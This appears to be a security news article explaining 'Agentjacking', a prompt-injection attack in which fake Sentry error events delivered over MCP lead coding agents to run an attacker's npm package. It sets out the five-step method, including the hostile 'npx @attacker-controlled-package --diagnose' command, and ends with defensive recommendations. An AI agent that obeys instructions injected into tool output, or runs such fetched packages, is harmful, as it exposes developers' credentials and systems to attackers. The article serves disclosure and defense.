The Trust Problem at the Heart of AI Agents
AI coding agents in 2026 do far more than autocomplete. Tools like Claude Code, Cursor, and Codex connect to external services through the Model Context Protocol (MCP) and act on the data they receive as if it were trusted system input. That implicit trust is exactly what Agentjacking exploits.
When a developer tells their coding agent to "fix unresolved Sentry issues," the agent queries Sentry via MCP and treats every returned error event as legitimate guidance. It cannot distinguish a real application crash from an attacker-injected payload — and that distinction is everything.
Traditional supply chain attacks require compromising infrastructure or stealing credentials. Agentjacking requires neither. The attacker never touches the target's systems — they just write to a public endpoint and let the agent do the rest.
How the Attack Works: Five Steps to Execution
Step 1 — Harvest the DSN. Sentry's Data Source Name (DSN) is a public, write-only credential intentionally embedded in frontend JavaScript. It's designed to be public. An attacker can extract it from any production website's source code.
Step 2 — Inject a fake error event. Using only the DSN, the attacker POSTs a crafted error event to Sentry's ingestion endpoint. No authentication required beyond the DSN.
Step 3 — Disguise it as official guidance. The injected event contains a carefully formatted "Resolution" section in the message field and context key names. When returned to the agent via the Sentry MCP server, it looks structurally and visually identical to Sentry's own remediation templates.
Step 4 — The agent receives the payload as trusted output. When the developer asks the agent to fix Sentry issues, the agent queries MCP and receives the malicious event as if it were a legitimate diagnostic result.
Step 5 — Execution with full developer privileges. The agent runs npx @attacker-controlled-package --diagnose, downloading and executing the package from the public npm registry with the developer's own permissions.
What an Attacker Can Reach
A single successful Agentjacking session can expose:
| Asset | Examples |
|---|---|
| Environment variables | API keys, database credentials |
| Cloud credentials | AWS access keys, GCP service accounts |
| Source code access | GitHub tokens, private repository URLs |
| CI/CD pipelines | Deployment secrets, signing keys |
| Persistent access | Backdoor installation, persistent remote access |
Why Existing Defenses Fail
Tenet named the underlying mechanism the "Authorized Intent Chain": every step in the attack chain is individually authorized. This is why it slips through EDR, firewalls, IAM policies, and VPNs — there is nothing unauthorized to detect.
Prompt engineering doesn't help either. Tenet explicitly instructed agents to ignore untrusted data. The agents ran the payload anyway, because MCP tool responses are not treated as untrusted user input — they come in as internal system signals.
The fundamental flaw is in how agents handle any external data source. GitHub issues, support tickets, documentation — any data channel connected to an agent through MCP carries the same risk. A separate recent test phished an AI email agent into leaking AWS keys via a single crafted email.
Sentry's Response
Tenet responsibly disclosed the issue to Sentry on June 3, 2026. Sentry's leadership responded the same day, acknowledging the problem but declining to fix it at the root, calling it "technically not defensible." Sentry subsequently added a content filter blocking one specific payload string — addressing the symptom while leaving the root cause intact.
Practical Defenses
- Configure AI agents to require human approval before executing code derived from MCP tool responses
- Apply least-privilege principles to agent sessions — avoid granting full developer permissions
- Require human review before any npm/pip install or npx command suggested by an agent
- Add system prompt instructions that explicitly classify MCP tool output as untrusted external data
- Audit which MCP servers your agents connect to, and inventory your exposed Sentry DSNs
- Implement real-time monitoring and alerting for commands executed during agent sessions
The Bigger Picture
Agentjacking is not an edge case. It is a structural consequence of giving AI agents write access to production systems while trusting the data those agents read from external sources. The agents that are most capable are also the most dangerous to compromise — and Agentjacking shows that "compromise" no longer requires an attacker to break anything.
As Tenet concludes: the only place left to stop this is the moment the agent decides to act.
— Tenet Security: Full Agentjacking Research Report
— The Hacker News: Agentjacking Attack Deep Dive
— Infosecurity Magazine: How to Defend Against AI Agent Hijacking